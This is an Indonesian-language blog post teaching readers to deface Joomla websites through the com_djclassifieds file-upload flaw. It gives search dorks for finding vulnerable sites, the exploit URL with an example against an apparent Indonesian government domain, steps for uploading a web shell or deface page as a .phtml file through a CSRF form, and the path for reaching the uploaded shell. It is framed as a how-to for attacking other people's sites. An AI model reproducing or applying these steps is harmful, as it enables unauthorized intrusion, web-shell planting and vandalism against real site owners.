Deface Poc Joomla Com_Djclassifieds


Deface CMS Joomla dengan menggunakan Poc/Metode Com_Djclassifieds 
Oke Pertama siapin bahan bahan nya:
Dork: 
inurl:/com_djclassifieds
inurl:/components/com_djclassifieds/
Xploit:
index.php?option=com_djclassifieds&task=upload&tmpl=component
Csrf Nya Klik Me

Pertama Dorking dulu dengan dork di atas,,pilih salah satu web nya,lalu kasih xploit
Contoh:
http://www.parkerz.go.id/index.php?option=com_djclassifieds&task&=upload&tmpl=component

Ciri-ciri Vuln? Ada tulisan Ke di Bawah

Kalo tulisan nya bukan kek di atas cari web lain
Lalu salin semua link nya dan masukan ke csrf nya
Yg di garis warna hijau ganti sama nama Shell/sc deface kalian.. tapi,Ext nya harus phtml
Kalo beruntung Shell kalian ga akan pecah,kali ini saya cuma nitip aja:v 
Lalu klik submit,nah kalo berhasil terupload bakal ada tulisan kek awal seperti di bawah..tapi kalo forbidden atau yg lain nya berarti ga berhasil terupload
Akses Shell Nya? 
http://www.site.lu/tmp/djupload/namashell.phtml
Dann Dorr:v 
Bilang kurang paham silahkan lihat video nya di bawah,Bye


Baca Juga

Post a Comment

3 Comments

  1. There are plenty of benefits Joomla will offer to the user. Ranging from the ease of access to a variety of options for developing any kind of platform.Joomla Hosting Company

    ReplyDelete